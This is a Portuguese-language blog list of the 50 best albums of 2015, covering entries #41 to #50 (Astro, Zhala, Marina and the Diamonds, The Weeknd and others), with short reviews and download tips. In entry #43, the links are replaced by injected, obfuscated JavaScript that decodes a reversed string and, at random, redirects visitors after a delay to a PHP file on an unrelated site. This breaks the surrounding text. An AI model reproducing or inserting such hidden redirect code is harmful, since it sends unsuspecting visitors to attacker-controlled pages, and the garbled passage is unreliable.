TOP 50 de discos de 2015 – # 41-50

#41. Astro
(Chicos De La Luz)

Em seu segundo trabalho de estúdio, os chilenos do Astro nos levam em uma viagem tropical e mística através de sua eletrônica rock experimental inspirada em games 8-bit para contar suas histórias fantasiosas (“Druida”) e de meditação. Chicos De La Luz seria como colocar parte do repertório de Enya num caleidoscópio sonoro colorido de excessivos sintetizadores hipnóticos, guitarras funkeadas e clima caloroso dos trópicos.

Dica de download: “Caribbean” ()



#42. Zhala
(Zhala)

A sueca Zhala, protegida e contratada pelo selo Konichiwa Records de Robyn, providencia uma rave cósmica e sensual numa avalanche de ritmos, instrumentos e percussão tribal com espírito e brilhantismo pop banhada no ácido. Suas composições de caráter festivo e pessoal são envolvidas pela sonoridade de suas raízes curdas com trance, industrial, disco, synthpop e bollywood num ambicioso trabalho de estreia.

Dica de download: “Aerobic Lambada” ()



#43. $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andthediamonds.com/” target=”blank”>Marina and the Diamonds
(FROOT)

Marina Diamandis encontra o equilíbrio na despretensão do álbum The Family Jewels (2010) com o exagero pop de Electra Heart (2012) em FROOT através de guitarras swingadas (“Froot” e “Forget”), baixos dançantes para acompanhar com palmas (“Can’t Pin Me Down”) – com um pé nos anos setenta na divertidíssima melancólica disco twang “Blue” e no indie pop rock em “Better Than That” -, sintetizadores etéreos (“Solitarie”) e baladas marcantes (“Happy”) sem perder a mão sentimental equilibrada nas composições.

Dica de download: “I’m A Ruin” ($VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and-the-diamonds-im-a-ruin-video/” target=”_blank”>)



#44. Kate Boy
(One)

“Everything we touch it turns to gold…”. O eletropop extasiante e carismático do Kate Boy soa como um encontro mágico de Zeigeist com ecos de The Knife e Kate Bush para representar sua eletrônica de caráter selvagem, sombrio e compassivo envolvido de tórridas camadas de sintetizadores oscilantes e o vocal dramático de Kate Akhurst.

Dica de download: “Nothern Lights” ()



#45. V V Brown
(Glitch)

“Se Björk e Grace Jones tivessem uma experiência lésbica e resultasse num bebê, eu queria ser essa criança”. Assim V V Brown vende o seu independente Glitch. Vocais fantasmagóricos, sonoridade que remete uma neo-Jones eletropop dark e composições particulares – em versos como “they said I would fail, they said I would crash” – auxiliam Brown na fuga dos holofotes e hits que a marcaram no início da carreira e ficam cada vez mais distante em sua evolução musical.

Dica de download: “Instincts” ()



#46. FFS
(FFS)

O encontro dos escoceses do Franz Ferdinand com o Sparks neste FFS funciona como um casamento suntuoso indie rock teatral com veia pop eletrônica (“Call Girl”). Como um grande musical trilhado pelas marchinhas da turma de Kapranos com a essência glam rock e sintetizadores espaciais dos Mael, com reviravoltas melódicas e letras irônicas (“Collaborations Don’t Work”), todos saem ganhando com esta união estável.

Dica de download: “Police Encounters” ()



#47. Baio
(The Names)

Chris Baio, o baixista do Vampire Weekend, apresenta em seu disco de estreia um emaranhado de informações sonoras da música eletrônica, na dançante “Brainwash yyrr Face” e na colorida “Needs” que caminha nos passos de uma produção do Hot Chip, e grandiosidade pop oitentista (“Endless Rhythm”) com sensibilidade única (como na instrumental “Scarlett”) ao sair da sombra de sua banda nesta obra eclética sobre encontrar sua identidade e lugar no mundo.

Dica de download: “Sister of Pearl” ()



#48. Peaches
(Rub)

Com seu pop obscuro e excêntrico, Peaches mantém o espírito animado em canções sobre sexualidade, feminismo e relacionamentos (como em “Dumb Fuck” que remete “Dancing On My Own” de Robyn) com muita baixaria e boca suja nas letras, além de chamar a versátil Feist para o refrão hipnótico de “I Mean Something” para dar uma elevada na auto-estima e dissertar sua relevância na cultura pop.

Dica de download: “Dumb Fuck” ()



#49. Tulipa Ruiz
(Dancê)

A cantora/compositora Tulipa Ruiz revela sua aura pop com muito groove e soul em composições extremamente alegres e inteligentes (“Proporcional”) para desenhar sua MPB dinâmica. Ruiz vem cheia de balanço para conquistar as pistas de dança, brinca com “Funkytown” – clássico do Lipps Inc. – em “Prumo” e faz homenagem à “Physical” – clássico de Olivia Newton John – em “Físico” com brasilidade. Com o DNA de Rita Lee e Tim Maia auxiliado de muita ginga (“Elixir”), Dancê é seu material mais pop e maduro para ouvir com o corpo inteiro.

Dica de download: “Elixir” ()



#50. The Weeknd
(Beauty Behind The Madness)

Em Beauty Behind The Madness, o canadense Abel Tsefaye (a.k.a. The Weeknd) carrega a estética sexy e nebulosa de suas mixtapes e álbum anterior (Kissland) com uma produção apurada para revelar seus jogos amorosos, personagens amaldiçoados (“In The Night”) e drogas (“Can’t Feel My Face”) ao grande público com a excelência pop de um Michael Jackson. Vale destacar a participação de nomes como Kanye West (na co-produção de “Tell Your Friends), Ed Sheeran (em “Dark Times”) e Lana Del Rey (em “Prisoner”) no registro.

Dica de download: “Tell Your Friends” ()